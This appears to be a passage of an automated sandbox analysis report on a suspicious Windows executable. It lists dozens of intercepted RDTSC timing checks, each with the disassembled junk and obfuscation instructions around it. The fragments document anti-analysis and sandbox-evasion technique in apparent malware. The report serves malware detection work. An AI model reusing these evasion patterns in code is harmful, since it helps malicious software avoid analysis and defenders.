Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9709A second address: B970A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B971ED second address: B971F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97375 second address: B97379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97379 second address: B9739E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FC22D01ECCAh 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9739E second address: B973AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FC22CC1B8A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B977E9 second address: B97854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD1h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC22D01ECD8h 0x0000000f popad 0x00000010 jnl 00007FC22D01ECEBh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FC22D01ECC6h 0x00000021 jl 00007FC22D01ECC6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97854 second address: B9785F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97B02 second address: B97B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97B22 second address: B97B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FC22CC1B8B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97B3C second address: B97B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC22D01ECD2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97CB9 second address: B97CD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jns 00007FC22CC1B8A6h 0x00000010 pop edi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97E38 second address: B97E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B98105 second address: B9810B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B1E817 second address: B1E83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC22D01ECC6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC22D01ECD8h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B729 second address: B9B72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B72F second address: B9B736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B736 second address: B9B76F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FC22CC1B8B6h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B76F second address: B9B77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B60C00 second address: B60C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B60C05 second address: B60C34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC22D01ECD1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B60C34 second address: B60C46 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FC22CC1B8A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61171 second address: B6117B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61220 second address: B61224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B612F1 second address: B612FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B612FE second address: B61308 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61308 second address: B6130E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6130E second address: B61312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B613A6 second address: B613B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B613B1 second address: B613CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8ABh 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FC22CC1B8A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B613CF second address: B613FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FC22D01ECCEh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC22D01ECCFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61B44 second address: B61B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61DFE second address: B61E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E02 second address: B61E0C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E0C second address: B61E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E12 second address: B61E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC22CC1B8A8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 pushad 0x00000026 mov ebx, 6B61FBEAh 0x0000002b mov ecx, 38E79CF7h 0x00000030 popad 0x00000031 lea eax, dword ptr [ebp+1248B8A3h] 0x00000037 mov dword ptr [ebp+122D241Eh], ecx 0x0000003d nop 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E5A second address: B61E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E5E second address: B61E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E85 second address: B403F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 or edx, 474D8100h 0x0000000d call dword ptr [ebp+122D2AFEh] 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FC22D01ECCEh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B403F3 second address: B403F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B403F7 second address: B40404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B40404 second address: B40411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FC22CC1B8A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9BD1F second address: B9BD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9BD23 second address: B9BD3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9BD3B second address: B9BD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C1B3 second address: B9C1C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC22CC1B8A6h 0x0000000a jnl 00007FC22CC1B8A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C1C3 second address: B9C1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C497 second address: B9C4AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B0h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C4AD second address: B9C4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FC22D01ECC6h 0x0000000b jnl 00007FC22D01ECC6h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FC22D01ECD0h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA19BB second address: BA19C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA1E2C second address: BA1E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22D01ECCBh 0x00000009 jmp 00007FC22D01ECCCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA1E47 second address: BA1E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2238 second address: BA2259 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD7h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA23DA second address: BA23E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA23E0 second address: BA23F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC22D01ECCDh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA259F second address: BA25C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FC22CC1B8A6h 0x00000010 jmp 00007FC22CC1B8B5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA25C4 second address: BA25D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FC22D01ECC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA25D9 second address: BA25EC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA277F second address: BA2785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2785 second address: BA278B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A77 second address: BA2A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A85 second address: BA2A8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A8B second address: BA2A9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A9C second address: BA2AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2EF1 second address: BA2EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2EF5 second address: BA2F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FC22CC1B8BAh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2F1B second address: BA2F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2F1F second address: BA2F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA810F second address: BA811D instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA8388 second address: BA83C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FC22CC1B8C3h 0x0000000f jmp 00007FC22CC1B8B7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B1B262 second address: B1B28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FC22D01ECD9h 0x0000000c pushad 0x0000000d jnc 00007FC22D01ECC6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02A1 second address: BB02B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC22CC1B8A6h 0x0000000e jbe 00007FC22CC1B8A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02B5 second address: BB02C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC22D01ECCEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02C6 second address: BB02CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02CC second address: BB02D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FC22D01ECC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB08C6 second address: BB08CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB08CB second address: BB08EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC22D01ECC6h 0x0000000a jmp 00007FC22D01ECD9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB08EE second address: BB0902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC22CC1B8AAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB0902 second address: BB0911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB54F5 second address: BB550A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB550A second address: BB5510 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB5510 second address: BB5554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC22CC1B8B9h 0x0000000c jmp 00007FC22CC1B8ADh 0x00000011 jns 00007FC22CC1B8A6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC22CC1B8ACh 0x0000001e jmp 00007FC22CC1B8B7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61776 second address: B6177C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6177C second address: B61801 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+1248B8E2h] 0x00000011 mov edi, dword ptr [ebp+12457ACAh] 0x00000017 add eax, ebx 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FC22CC1B8A8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov edi, ebx 0x00000035 push eax 0x00000036 jnl 00007FC22CC1B8B4h 0x0000003c mov dword ptr [esp], eax 0x0000003f jmp 00007FC22CC1B8B0h 0x00000044 jmp 00007FC22CC1B8AFh 0x00000049 push 00000004h 0x0000004b js 00007FC22CC1B8ACh 0x00000051 sub dword ptr [ebp+122D261Eh], esi 0x00000057 nop 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push edi 0x0000005c pop edi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB644E second address: BB645E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 js 00007FC22D01ECEAh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB645E second address: BB6464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB6464 second address: BB6468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
